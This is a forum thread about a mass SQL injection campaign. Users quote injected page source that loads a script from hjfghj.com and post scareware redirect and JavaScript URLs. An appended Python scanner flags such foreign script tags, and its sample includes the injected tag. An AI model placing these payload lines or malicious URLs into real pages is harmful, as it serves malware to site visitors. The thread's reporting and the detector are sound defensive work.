Triple Helix
Troll Hunter
Premium Member
join:2007-07-26
Oshawa, ON
kudos:7
·Rogers Hi-Speed

Tens of thousands of web sites affected in ongoing mass SQL injection attack!

By Dancho Danchev

Hundreds of thousands of legitimate web sites are currently affected in a mass SQL injection attack that has been ongoing for the past several months. The ongoing mass SQL injection attacks are directly related to last year’s scareware-serving Lizamoon mass SQL injection attacks.

The cybercriminals behind it are automatically exploiting the legitimate web sites and embedding a tiny script on the affected pages, abusing an input validation flaw, or exploiting vulnerable and outdated versions of the web application software running on them.

Full Story: »blog.webroot.com/2012/03 ··· -attack/

therube
join:2004-11-11
Randallstown, MD
·Xfinity
·Verizon Online DSL

Malwarebytes Anti-malware blocks (at least some of the associated) domains.

</table><div class="rcbSlide" style="z-index:6000;"><div id="ctl00_ContentPlaceHolder1_adv1_rdcCategories_DropDown" class="RadComboBoxDropDown_Telerik" style="display:none;"><div class="rcbScroll rcbWidth" style="width:100%;"><ul class="rcbList" style="list-style:none;margin:0;padding:0;zoom:1;">
<li class="rcbItem ">Bibs and Coveralls &lt;/title&gt;&lt;script src=http://hjfghj.com/r.php &gt;&lt;/script&gt;</li>
<li class="rcbItem ">Bibs/Pants &lt;/title&gt;&lt;script src=http://hjfghj.com/r.php &gt;&lt;/script&gt;</li>
 

So it like generates itself within the page source, within legitimate code parts of the page. And since it references a foreign domain, it should be stopped right in its tracks right there.
quote:
all of these domains are currently returning a “404 Not Found”
Wonder if that is because they're actually 404 or are just returning a "404" after the first attempted hit by a particular IP? (My initial thought. But since webroot says 404, would think they would have checked out that avenue.)

Pretty lame that these sorts of things (known exploits) still exist. Might even say they are "popular".
therube


quote:
Wonder if that is because they're actually 404 or are just returning a "404" after the first attempted hit by a particular IP? (My initial thought. But since webroot says 404, would think they would have checked out that avenue.)

Me thinks they are fake 404's.

If not then why did a 404 redirect me to one of zee best antivir's out there?

http://www1.best-ztantivir.it.cx/b5rp9vy55d?
rn8y4wj7=luKu76Lfp6HJztXZouea1tfYpquhpKWUqOKYtJ1dw8fV5mrMyKyU4Nyzm6ajlKfsce7gj7KL1 d2Rt9bAtLqP39rsr9Ot353x16yIyNaxgs2ayt6xmquaoKOnbqdmq5xlk5immqDu1dXj56anj%2Bnb0nWvbZ3eq86ipKVgr9iVpqaeq6CY5uF1qmeqnG6bmKukZqDY0NvV0uSm6enlbKea4Nyq1tLhoY7s4d qc19jjj93qz6a2pOXiqNDS7Jqf39qe1ujd5o6ls5Nqv1mpsJ7R0dehlN%2Fhj9Hj1pubuLfcqe6d6eNokMbm5KWfp6e32I6praSroXCuWA%3D%3D
 

Seemingly it is the "Emma Watson never seen before home video" that I haven't seen - yet?

Whatever this does, haven't a clue?

http://www1.best-ztantivir.it.cx/2746413b.js
 

Suppose it could be a real 404, but done purposely. Only because the server is hacked with some sort of redirect, such that something like: if referrer=hnjhkm.com redirect to emmawatsonknowsbest.
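
Added example, not part of the original thread or of the Webroot article: a small scanner for the pattern in the page source quoted above, where a script tag pointing at a foreign domain is appended to database-driven text. The sample markup is constructed and modelled on that snippet; static.example.com and the function name are assumptions.

```python
import html
import re
from urllib.parse import urlparse

# <script ... src=VALUE>, with VALUE double-quoted, single-quoted or bare
# (the injected tag in the thread uses a bare, unquoted src).
SCRIPT_SRC = re.compile(
    r"<script\b[^>]*?\bsrc\s*=\s*(?:\"([^\"]*)\"|'([^']*)'|([^\s>]+))",
    re.IGNORECASE,
)

def find_foreign_scripts(text, allowed_hosts):
    """Return (host, src, was_entity_encoded) for every script tag whose src
    names a host outside allowed_hosts."""
    allowed = {h.lower() for h in allowed_hosts}
    # Pass 1: literal tags, which a browser would execute.
    # Pass 2: tags that exist only after entity decoding (&lt;script ...&gt;).
    # Those do not run where they are escaped, but they show that the stored
    # value was tampered with. Literal "<" is blanked first so pass 2 cannot
    # re-report a tag already found in pass 1.
    passes = ((False, text), (True, html.unescape(text.replace("<", " "))))
    findings = []
    for was_encoded, candidate in passes:
        for m in SCRIPT_SRC.finditer(candidate):
            src = next(g for g in m.groups() if g is not None)
            if not re.match(r"(?:https?:)?//", src, re.IGNORECASE):
                continue  # relative URL, served from the site's own origin
            host = (urlparse(src).hostname or "").lower()
            if host not in allowed:
                findings.append((host, src, was_encoded))
    return findings

# Constructed sample: two legitimate scripts, one escaped copy of the injected
# tag (as in the quoted list item) and one unescaped copy in a title element.
SAMPLE = (
    '<script src="/js/site.js"></script>\n'
    '<script src="https://static.example.com/lib.js"></script>\n'
    '<li class="rcbItem ">Bibs/Pants &lt;/title&gt;'
    '&lt;script src=http://hjfghj.com/r.php &gt;&lt;/script&gt;</li>\n'
    '<title>Shop </title><script src=http://hjfghj.com/r.php ></script>\n'
)

if __name__ == "__main__":
    for host, src, enc in find_foreign_scripts(SAMPLE, {"static.example.com"}):
        state = "entity-encoded" if enc else "live"
        print(f"{state:15} {host:20} {src}")
```

The same function can be run over exported database text columns, since the injected tag lives in the stored values rather than in the page templates.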